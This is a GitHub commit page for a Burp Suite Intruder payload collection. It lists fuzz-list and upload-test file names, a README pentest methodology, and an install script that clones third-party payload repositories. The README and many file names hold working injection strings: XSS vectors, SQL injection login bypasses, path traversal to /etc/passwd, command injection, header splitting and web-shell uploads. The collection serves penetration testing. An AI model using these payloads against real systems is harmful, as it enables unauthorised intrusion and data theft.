Skip to content

Commit

Permalink
IntruderPayloads by 1N3@CrowdShield
Browse files Browse the repository at this point in the history
  • Loading branch information
root committed Feb 20, 2017
1 parent 3c957a5 commit ec37930
Show file tree
Hide file tree
Showing 207 changed files with 317 additions and 2 deletions.
Empty file modified BurpAttacks/01_burpattack_basic_methods
100644 → 100755
Empty file.
Empty file modified BurpAttacks/01_burpattack_dirbuster
100644 → 100755
Empty file.
Empty file modified BurpAttacks/01_burpattack_fast_fuzz
100644 → 100755
Empty file.
Empty file modified BurpAttacks/02_burpattack_vulnerabilities_all
100644 → 100755
Empty file.
Empty file modified BurpAttacks/03_burpattack_find_inject
100644 → 100755
Empty file.
Empty file modified BurpAttacks/03_burpattack_find_injectx
100644 → 100755
Empty file.
Empty file modified BurpAttacks/04_burpattack_basic_fuzz
100644 → 100755
Empty file.
Empty file modified BurpAttacks/04_burpattack_sqli_quick_fuzz
100644 → 100755
Empty file.
Empty file modified BurpAttacks/05_burpattack_full_fuzz
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burp_config
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burp_project_options.json
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burp_user_options.json
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_basic_auth_brute
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_brute_force
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_command_exec
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_find_injectx
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_nums_1-100
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_overflow
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_server_side_include
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_shellshock
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_sqli_authbypass
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_sqli_error_based
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_sqli_quick_fuzz
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_sqli_time_based
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_url_attacks
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_wordpress
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_xmlrpc_dos
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_xpath_injection
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_xss
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_xss_stored
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpattack_xxe
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burpconfig_default
100644 → 100755
Empty file.
Empty file modified BurpAttacks/burprepeater_xxe
100644 → 100755
Empty file.
Empty file modified BurpAttacks/shellshock_attack
100644 → 100755
Empty file.
Empty file modified FuzzLists/auth_bypass.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/bad_chars.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/basic_fuzz.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/command_exec.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/dirbuster-cgi.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/dirbuster-dirs.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/dirbuster-quick.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/dirbuster-top1000.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/full_fuzz.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/grep_injectx.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/lfi.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/overflow-dos.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/overflow.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/passwords_long.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/passwords_medium.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/passwords_quick.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/payload_injectx.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/quick_fuzz.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/sqli-error-based.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/sqli-time-based.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/sqli-union-select.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/sqli_escape_chars.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/ssi_quick.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/traversal-short.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/traversal.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/url_payloads.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/usernames.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/vulnerability_discovery.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xml-attacks.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_escape_chars.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_find_inject.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_funny_stored.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_grep.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_payloads_quick.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_remote_payloads-http.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_remote_payloads-https.txt
100644 → 100755
Empty file.
Empty file modified FuzzLists/xss_swf_fuzz.txt
100644 → 100755
Empty file.
Empty file modified OWASPTestingChecklist_v_1.0.xls
100644 → 100755
Empty file.
Empty file modified Plugins/BurpKit-1.02-pre.jar
100644 → 100755
Empty file.
Empty file modified Plugins/jruby-complete-9.0.0.0.jar
100644 → 100755
Empty file.
Empty file modified Plugins/jython-standalone-2.7.0.jar
100644 → 100755
Empty file.
308 changes: 306 additions & 2 deletions README.md
100644 → 100755
Original file line number Diff line number Diff line change
@@ -1,4 +1,308 @@
# IntruderPayloads
A collection of Burpsuite Intruder payloads and fuzz lists
A collection of Burpsuite Intruder payloads and fuzz lists and pentesting methodology. To pull down all 3rd party repos, run install.sh in the same directory of the IntruderPayloads folder.

Any comments or feedback/changes/improvements are welcome!

Author: 1N3@CrowdShield https://crowdshield.com


## PENTEST METHODOLOGY v2.0



### BASIC PASSIVE AND ACTIVE CHECKS:
-----------------------------------------------------------------------

- Burpsuite Spider with intelligent form submission
- Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
- Burpsuite passive scan
- Burpsuiet engagement tools > Search > ```<form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl```
- Burpsuite engagement tools > Find comments
- Burpsuite engagement tools > Find scripts
- Burpsuite engagement tools > Find references
- Burpsuite engagement tools > Analyze target
- Burpsuite engagement tools > Discover content
- Burpsuite Intruder > file/directory brute force
- Burpsuite Intruder > HTTP methods, user agents, etc.
- Enumerate all software technologies, HTTP methods, and potential attack vectors
- Understand the function of the site, what types of data is stored or valuable and what sorts of functions to attack, etc.






### ENUMERATION:
-----------------------------------------------------------------------

- OPERATING SYSTEM
- WEB SERVER
- DATABASE SERVERS
- PROGRAMMING LANGUAGES
- PLUGINS/VERSIONS
- OPEN PORTS
- USERNAMES
- SERVICES
- WEB SPIDERING
- GOOGLE HACKING


### VECTORS:
-----------------------------------------------------------------------

- INPUT FORMS
- GET/POST PARAMS
- URI/REST STRUCTURE
- COOKIES
- HEADERS



### SEARCH STRINGS:
-----------------------------------------------------------------------
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...
```
fname|phone|id|org_name|name|email
```




### QUICK ATTACK STRINGS:
-----------------------------------------------------------------------
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...
```
Company
First Last
username
[email protected]
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt%00.png
https://google.com/.injectx/rfi_vuln.txt%00.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' --
"></textarea><img/onload=alert(1)>' --
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!--
"><img/onload=alert(1)>' -- // INJECTX <!--
INJECTX'"><h1>X<!--
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd%00
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"--
admin' or '1'='1'--
firstlastcompany%0a%0d%00
```




### OWASP TESTING CHECKLIST:
-----------------------------------------------------------------------
- Spiders, Robots and Crawlers IG-001
- Search Engine Discovery/Reconnaissance IG-002
- Identify application entry points IG-003
- Testing for Web Application Fingerprint IG-004
- Application Discovery IG-005
- Analysis of Error Codes IG-006
- SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
- DB Listener Testing - DB Listener weak CM‐002
- Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
- Application Configuration Management Testing - Application Configuration management weakness CM‐004
- Testing for File Extensions Handling - File extensions handling CM‐005
- Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
- Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
- Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
- Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
- Testing for user enumeration - User enumeration AT-002
- Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
- Brute Force Testing - Credentials Brute forcing AT-004
- Testing for bypassing authentication schema - Bypassing authentication schema AT-005
- Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
- Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-007
- Testing for CAPTCHA - Weak Captcha implementation AT-008
- Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
- Testing for Race Conditions - Race Conditions vulnerability AT-010
- Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
- Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002
- Testing for Session Fixation - Session Fixation SM-003
- Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
- Testing for CSRF - CSRF SM-005
- Testing for Path Traversal - Path Traversal AZ-001
- Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
- Testing for Privilege Escalation - Privilege Escalation AZ-003
- Testing for Business Logic - Bypassable business logic BL-001
- Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
- Testing for Stored Cross Site Scripting - Stored XSS DV-002
- Testing for DOM based Cross Site Scripting - DOM XSS DV-003
- Testing for Cross Site Flashing - Cross Site Flashing DV-004
- SQL Injection - SQL Injection DV-005
- LDAP Injection - LDAP Injection DV-006
- ORM Injection - ORM Injection DV-007
- XML Injection - XML Injection DV-008
- SSI Injection - SSI Injection DV-009
- XPath Injection - XPath Injection DV-010
- IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
- Code Injection - Code Injection DV-012
- OS Commanding - OS Commanding DV-013
- Buffer overflow - Buffer overflow DV-014
- Incubated vulnerability - Incubated vulnerability DV-015
- Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
- Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
- Locking Customer Accounts - Locking Customer Accounts DS-002
- Testing for DoS Buffer Overflows - Buffer Overflows DS-003
- User Specified Object Allocation - User Specified Object Allocation DS-004
- User Input as a Loop Counter - User Input as a Loop Counter DS-005
- Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
- Failure to Release Resources - Failure to Release Resources DS-007
- Storing too Much Data in Session - Storing too Much Data in Session DS-008
- WS Information Gathering - N.A. WS-001
- Testing WSDL - WSDL Weakness WS-002
- XML Structural Testing - Weak XML Structure WS-003
- XML content-level Testing - XML content-level WS-004
- HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-005
- Naughty SOAP attachments - WS Naughty SOAP attachments WS-006
- Replay Testing - WS Replay Testing WS-007
- AJAX Vulnerabilities - N.A. AJ-001
- AJAX Testing - AJAX weakness AJ-002




### LOW SEVERITY:
-----------------------------------------------------------------------
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.
- Descriptive error messages (e.g. Stack Traces, application or server errors).
- HTTP 404 codes/pages or other HTTP non-200 codes/pages.
- Banner disclosure on common/public services.
- Disclosure of known public files or directories, (e.g. robots.txt).
- Click-Jacking and issues only exploitable through click-jacking.
- CSRF on forms which are available to anonymous users (e.g. the contact form).
- Logout Cross-Site Request Forgery (logout CSRF).
- Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
- Lack of Secure and HTTPOnly cookie flags.
- Lack of Security Speedbump when leaving the site.
- Weak Captcha / Captcha Bypass
- Username enumeration via Login Page error message
- Username enumeration via Forgot Password error message
- Login or Forgot Password page brute force and account lockout not enforced.
- OPTIONS / TRACE HTTP method enabled
- SSL Attacks such as BEAST, BREACH, Renegotiation attack
- SSL Forward secrecy not enabled
- SSL Insecure cipher suites
- The Anti-MIME-Sniffing header X-Content-Type-Options
- Missing HTTP security headers
- Security best practices without accompanying Proof-of-Concept exploitation
- Descriptive error messages (e.g. Stack Traces, application or server errors).
- HTTP 404 codes/pages or other HTTP non-200 codes/pages.
- Denial of Service Attacks.
- Fingerprinting / banner disclosure on common/public services.
- Disclosure of known public files or directories, (e.g. robots.txt).
- Clickjacking and issues only exploitable through clickjacking.
- CSRF on non-sensitive forms.
- Logout Cross-Site Request Forgery (logout CSRF).
- Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
- Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
- Lack of Security Speedbump when leaving the site.
- Weak Captcha / Captcha Bypass
- Login or Forgot Password page brute force and account lockout not enforced.
- OPTIONS HTTP method enabled
- HTTPS Mixed Content Scripts
- Known vulnerable libraries
- Attacks on Third Party Ad Services
- Username / email enumeration via Forgot Password or Login page
- Missing HTTP security headers
- Strict-Transport-Security Not Enabled For HTTPS
- X-Frame-Options
- X-XSS-Protection
- X-Content-Type-Options
- Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
- Content-Security-Policy-Report-Only
- SSL Issues, e.g.
- SSL Attacks such as BEAST, BREACH, Renegotiation attack
- SSL Forward secrecy not enabled
- SSL weak / insecure cipher suites
- Lack of SPF records (Email Spoofing)
- Auto-complete enabled on password fields
- HTTP enabled
- Session ID or Login Sent Over HTTP
- Insecure Cookies
- Cross-Domain.xml Allows All Domains
- HTML5 Allowed Domains
- Cross Origin Policy
- Content Sniffing Not Disabled
- Password Reset Account Enumeration
- HTML Form Abuse (Denial of Service)
- Weak HSTS Age (86,000 or less)
- Lack of Password Security Policy (Brute Forcable Passwords)
- Physical Testing
- Denial of service attacks
- Resource Exhaustion attacks
- Issues related to rate limiting
- Login or Forgot Password page brute force and account lockout not enforced
- api*.netflix.com listens on port 80
- Cross-domain access policy scoped to *.netflix.com
- Username / Email Enumeration
- via Login Page error message
- via Forgot Password error message
- via Registration
- Weak password
- Weak Captcha / Captcha bypass
- Lack of Secure/HTTPOnly flags on cookies
- Cookie valid after logout
- Cookie valid after password reset
- Cookie expiration
- Forgot password autologin
- Autologin token reuse
- Same Site Scripting
- SSL Issues, e.g.
- SSL Attacks such as BEAST, BREACH, Renegotiation attack
- SSL Forward secrecy not enabled
- SSL weak / insecure cipher suites
- SSL vulnerabilities related to configuration or version
- Descriptive error messages (e.g. Stack Traces, application or server errors).
- HTTP 404 codes/pages or other HTTP non-200 codes/pages.
- Fingerprinting/banner disclosure on common/public services.
- Disclosure of known public files or directories, (e.g. robots.txt).
- Clickjacking and issues only exploitable through clickjacking.
- CSRF on forms that are available to anonymous users (e.g. the contact form).
- Logout Cross-Site Request Forgery (logout CSRF).
- Missing CSRF protection on non-sensitive functionality
- Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
- Incorrect Charset
- HTML Autocomplete
- OPTIONS HTTP method enabled
- TRACE HTTP method enabled
- Missing HTTP security headers, specifically
- (https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
- Strict-Transport-Security
- X-Frame-Options
- X-XSS-Protection
- X-Content-Type-Options
- Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
- Content-Security-Policy-Report-Only
- Issues only present in old browsers/old plugins/end-of-life software browsers
- IE < 9
- Chrome < 40
- Firefox < 35
- Safari < 7
- Opera < 13
- Vulnerability reports related to the reported version numbers of web servers, services, or frameworks

Author: 1N3 @ CrowdShield https://crowdshield.com
Empty file modified Uploads/"
100644 → 100755
Empty file.
Empty file modified Uploads/" --
100644 → 100755
Empty file.
Empty file modified Uploads/"><iframe src=" javascript:alert('XSS');">.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/"><iframe src=" javascript:alert('XSS');">.xml
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>.cfg
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>.csv
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>.docx
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>.img
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>.torrent
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>.zip
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>2.csv
100644 → 100755
Empty file.
Empty file modified Uploads/"><img onload=prompt(1)>2.docx
100644 → 100755
Empty file.
Empty file modified Uploads/"><img src=x onload=prompt(1)>.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/"><svg onload=alert(1)>.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%00';alert(1);.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%00';alert(2);.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%001.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%0011.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%0a';alert(1);.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%0a';alert(2);.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%0a1.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%1.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%22%3E%3Csvg%20onload%3Dalert(1)%3E.png
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%22__img src=x onerror=prompt(1)_.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/%22onerror=%22alert(1)%22a=%22.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/' having 1=1
100644 → 100755
Empty file.
Empty file modified Uploads/'" --
100644 → 100755
Empty file.
Empty file modified Uploads/'+alert(1)+'.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/'.swf
100644 → 100755
Empty file.
Empty file modified Uploads/';alert(1);x='.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/.zip
100644 → 100755
Empty file.
Empty file modified Uploads/1N3.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/1N3.php
100644 → 100755
Empty file.
Empty file modified Uploads/1N3.php\x00.csv
100644 → 100755
Empty file.
Empty file modified Uploads/1N3.php\x00.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/404.php.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/<h1>INJECTX.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/<hr>test<hr>
100644 → 100755
Empty file.
Empty file modified Uploads/<img
100644 → 100755
Empty file.
Empty file modified Uploads/<img onload=prompt(1)>.csv
100644 → 100755
Empty file.
Empty file modified Uploads/<img src="c" onerror=alert(1)>
100644 → 100755
Empty file.
Empty file modified Uploads/BillionLaughs.txt
100644 → 100755
Empty file.
Empty file modified Uploads/Desktop.rar
100644 → 100755
Empty file.
Empty file modified Uploads/EventsSources.xml
100644 → 100755
Empty file.
Empty file modified Uploads/ProxyTarget.xml
100644 → 100755
Empty file.
Empty file modified Uploads/Service.xml
100644 → 100755
Empty file.
Empty file modified Uploads/Sun'><img src=x onerror=alert(1)>set.jpg
100644 → 100755
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file modified Uploads/Sun'__img src=x onerror=alert(1)_set.jpg
100644 → 100755
Empty file modified Uploads/\';alert\(XSS\);x=\'
100644 → 100755
Empty file.
Empty file modified Uploads/alt-extensions-asp.txt
100644 → 100755
Empty file.
Empty file modified Uploads/alt-extensions-coldfusion.txt
100644 → 100755
Empty file.
Empty file modified Uploads/alt-extensions-jsp.txt
100644 → 100755
Empty file.
Empty file modified Uploads/alt-extensions-perl.txt
100644 → 100755
Empty file.
Empty file modified Uploads/alt-extensions-php.txt
100644 → 100755
Empty file.
Empty file modified Uploads/download.gif
100644 → 100755
Empty file modified Uploads/evil-xxe.docx
100644 → 100755
Empty file.
Empty file modified Uploads/exifremover.jpg
100644 → 100755
Empty file modified Uploads/exploit.jpg
100644 → 100755
Empty file modified Uploads/exploit.mvg
100644 → 100755
Empty file.
Empty file modified Uploads/exploit.png
100644 → 100755
Empty file modified Uploads/exploit.svg
100644 → 100755
Empty file modified Uploads/file-ul-filter-bypass-commonly-writable-directories.txt
100644 → 100755
Empty file.
Empty file modified Uploads/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
100644 → 100755
Empty file.
Empty file modified Uploads/file-ul-filter-bypass-microsoft-asp.txt
100644 → 100755
Empty file.
Empty file modified Uploads/file-ul-filter-bypass-ms-php.txt
100644 → 100755
Empty file.
Empty file modified Uploads/file-ul-filter-bypass-x-platform-generic.txt
100644 → 100755
Empty file.
Empty file modified Uploads/file-ul-filter-bypass-x-platform-php.txt
100644 → 100755
Empty file.
Empty file modified Uploads/file-ul-filter-bypass.readme
100644 → 100755
Empty file.
Empty file modified Uploads/gifshell.php.gif
100644 → 100755
Empty file modified Uploads/hithere.php.jpg
100644 → 100755
Empty file modified Uploads/image%00.jpg
100644 → 100755
Empty file modified Uploads/image.jpg
100644 → 100755
Empty file modified Uploads/image.php
100644 → 100755
Empty file.
Empty file modified Uploads/image_upload_test.rar
100644 → 100755
Empty file.
Empty file modified Uploads/import_csv_template.csv
100644 → 100755
Empty file.
Empty file modified Uploads/import_csv_template2.csv
100644 → 100755
Empty file.
Empty file modified Uploads/invalid-filenames-linux.txt
100644 → 100755
Empty file.
Empty file modified Uploads/invalid-filenames-microsoft.txt
100644 → 100755
Empty file.
Empty file modified Uploads/invalid-filesystem-chars-microsoft.txt
100644 → 100755
Empty file.
Empty file modified Uploads/invalid-filesystem-chars-osx.txt
100644 → 100755
Empty file.
Empty file modified Uploads/jaja.php.orionn.gif
100644 → 100755
Empty file modified Uploads/jpeg.php%00.jpg
100644 → 100755
Empty file modified Uploads/jpeg.php.jpg
100644 → 100755
Empty file modified Uploads/jpeg/test.jpeg
100644 → 100755
Empty file modified Uploads/kos`uname`oss.jpg
100644 → 100755
Empty file modified Uploads/loading.gif
100644 → 100755
Empty file modified Uploads/mp4/1.mp4
100644 → 100755
Empty file.
Empty file modified Uploads/mp4/mp4uploadtext.txt
100644 → 100755
Empty file.
Empty file modified Uploads/mvg_read.mvg
100644 → 100755
Empty file.
Empty file modified Uploads/mvg_ssrf.mvg
100644 → 100755
Empty file.
Empty file modified Uploads/onerror=alert('XSS')' a='.jpg
100644 → 100755
Empty file modified Uploads/passwd.zip
100644 → 100755
Empty file.
Empty file modified Uploads/php-backdoor.docx
100644 → 100755
Empty file.
Empty file modified Uploads/php-backdoor.jpg
100644 → 100755
Empty file modified Uploads/php-backdoor.php
100644 → 100755
Empty file.
Empty file modified Uploads/php-backdoor.php%00.jpg
100644 → 100755
Empty file modified Uploads/php-backdoor.php.jpg
100644 → 100755
Empty file modified Uploads/phpinfo.jpg
100644 → 100755
Empty file modified Uploads/phpinfo.php.gif
100644 → 100755
Empty file modified Uploads/phppng.png
100644 → 100755
Empty file modified Uploads/png/image.php.png
100644 → 100755
Empty file modified Uploads/publications.opml
100644 → 100755
Empty file.
Empty file modified Uploads/pwnd.php.jpg
100644 → 100755
Empty file modified Uploads/rce.php.jpg
100644 → 100755
Empty file modified Uploads/rce2.php.jpg
100644 → 100755
Empty file modified Uploads/shell.php;.jpg
100644 → 100755
Empty file modified Uploads/shell.png
100644 → 100755
Empty file modified Uploads/shell2.php;.jpg
100644 → 100755
Empty file modified Uploads/simple-backdoor.php
100644 → 100755
Empty file.
Empty file modified Uploads/simple-backdoor.php.gif
100644 → 100755
Empty file modified Uploads/simple-backdoor2.php.gif
100644 → 100755
Empty file modified Uploads/ssrf.jpg
100644 → 100755
Empty file modified Uploads/ssrf.mvg
100644 → 100755
Empty file.
Empty file modified Uploads/ssrf.png
100644 → 100755
Empty file modified Uploads/svg-xss-xml.svg
100644 → 100755
Empty file modified Uploads/swf/test.html
100644 → 100755
Empty file.
Empty file modified Uploads/swf/xssproject.swf
100644 → 100755
Empty file.
Empty file modified Uploads/uploads.csv
100644 → 100755
Empty file.
Empty file modified Uploads/weevely_shell.php
100644 → 100755
Empty file.
Empty file modified Uploads/white_hat%0a.png
100644 → 100755
Empty file modified Uploads/xss.html\x00.jpg
100644 → 100755
Empty file modified Uploads/xsspng.png
100644 → 100755
Empty file modified Uploads/xsspng.png\x00.csv
100644 → 100755
Empty file.
Empty file modified Uploads/|ls
100644 → 100755
Empty file.
Empty file modified Uploads/|ls%20-al
100644 → 100755
Empty file.
Empty file modified Uploads/|| cat %2fetc%2fpasswd;test.jpg
100644 → 100755
11 changes: 11 additions & 0 deletions install.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
#!/bin/bash
mkdir Repositories/
cd Repositories
git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git
git clone https://github.com/xmendez/wfuzz.git
git clone https://github.com/fuzzdb-project/fuzzdb.git
